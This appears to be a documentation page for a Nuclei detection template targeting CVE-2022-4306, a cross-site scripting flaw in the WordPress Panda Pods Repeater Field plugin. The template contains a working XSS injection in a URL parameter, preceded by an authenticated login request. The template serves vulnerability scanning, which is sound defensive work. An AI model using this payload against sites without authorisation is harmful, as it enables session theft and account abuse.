WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting
ID: CVE-2022-4306
Severity: medium
Author: r3Y3r53
Tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project
Description
Section titled “Description”WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: CVE-2022-4306
info: name: WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.4. reference: - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe - https://nvd.nist.gov/vuln/detail/CVE-2022-4306 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-4306 cwe-id: CWE-79 epss-score: 0.00092 epss-percentile: 0.37956 cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: panda_pods_repeater_field_project product: panda_pods_repeater_field framework: wordpress tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "panda-repeater-add-new")' condition: and# digest: 4a0a00473045022100f7bcdfa91888dfbd43897395bfcafee5f9760cbbebec994960994f766887068c022079f97d7dba8e5f47b4a2b01394e9cb468601753bd1f3a22b8d7ee5e134889c17:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4306.yaml"